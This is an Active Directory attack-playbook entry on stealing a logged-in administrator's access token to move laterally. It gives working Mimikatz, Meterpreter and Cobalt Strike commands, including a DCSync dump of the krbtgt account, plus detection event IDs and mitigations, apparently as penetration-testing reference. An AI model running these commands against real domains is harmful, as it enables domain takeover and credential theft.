attack-60-token-stealing-and-impersonation.md (3543B)
1 --- 2 title: "Attack #60 — Token Stealing and Impersonation" 3 description: "When a privileged user (e.g., Domain Admin) is logged into a compromised machine, their access token persists in memory. An attacker with local…" 4 category: active-directory 5 subcategory: "Lateral Movement" 6 tags: ["active-directory", "credential-access", "delegation", "privilege-escalation", "lateral-movement"] 7 tools: ["Mimikatz", "Meterpreter", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Seven/⚫ Attack #60 — Token Stealing and Impersonation.md" 11 --- 12 # ⚫ Attack #60 — Token Stealing & Impersonation (Lateral) 13 14 *** 15 16 ## 📖 How It Works 17 18 When a privileged user (e.g., Domain Admin) is logged into a compromised machine, their **access token** persists in memory. An attacker with local admin/SYSTEM can **steal that token** and use it to perform actions as that user — including accessing other machines, without knowing their password. This differs from Attack #45 (SeImpersonatePrivilege) — this is about **stealing existing logged-in user tokens** for lateral movement. 19 20 *** 21 22 ## ⚙️ Prerequisites 23 24 | Requirement | Detail | 25 |---|---| 26 | **SYSTEM or local admin on target** | To access other users' tokens | 27 | **Privileged user logged in** | DA/admin must have an active or cached session | 28 29 *** 30 31 ## 💻 Full Commands 32 33 ```powershell 34 # ── Mimikatz — token manipulation ───────────────────────────────────────────── 35 privilege::debug 36 token::elevate # Elevate to SYSTEM token 37 token::list # List all available tokens 38 token::impersonate /user:CORP\da_admin # Impersonate a specific user's token 39 40 # After impersonation: 41 dir \\DC01.corp.local\C$ # Access DC as DA 42 lsadump::dcsync /domain:corp.local /user:krbtgt # DCSync as DA 43 ``` 44 45 ```bash 46 # ── Meterpreter — Incognito ─────────────────────────────────────────────────── 47 meterpreter> load incognito 48 meterpreter> list_tokens -u 49 # Delegation Tokens Available: 50 # CORP\da_admin 51 meterpreter> impersonate_token "CORP\da_admin" 52 meterpreter> shell 53 whoami 54 # corp\da_admin 55 ``` 56 57 ```powershell 58 # ── Cobalt Strike (beacon) ──────────────────────────────────────────────────── 59 # steal_token <PID> # Steal token from a specific process 60 # make_token CORP\user pass # Create token with credentials 61 # rev2self # Revert to original token 62 ``` 63 64 *** 65 66 ## 🛡️ Detection — Event IDs 67 68 | Event ID | Source | What to Look For | 69 |---|---|---| 70 | **4624** | Security Log | Logon Type 9 (NewCredentials) — token impersonation | 71 | **Sysmon 10** | Sysmon | Process access — tool accessing LSASS for token enumeration | 72 73 *** 74 75 ## 🔗 Attack Chain Context 76 77 ``` 78 [Token Stealing] ──→ Steal logged-in admin's token → lateral movement as them 79 │ 80 ├──→ 🔑 No password needed — just steal the token from memory 81 ├──→ 🔗 Commonly used after: initial compromise → SYSTEM → token theft 82 └──→ 💀 Defeated by: limit DA logon to workstations, use PAW, Credential Guard 83 ``` 84 85 *** 86 87 > ✅ **Attack #60 — Token Stealing complete.** 88 89 *** 90 91 > 🏁 **Category 7 — Lateral Movement is now COMPLETE (7/7 attacks).**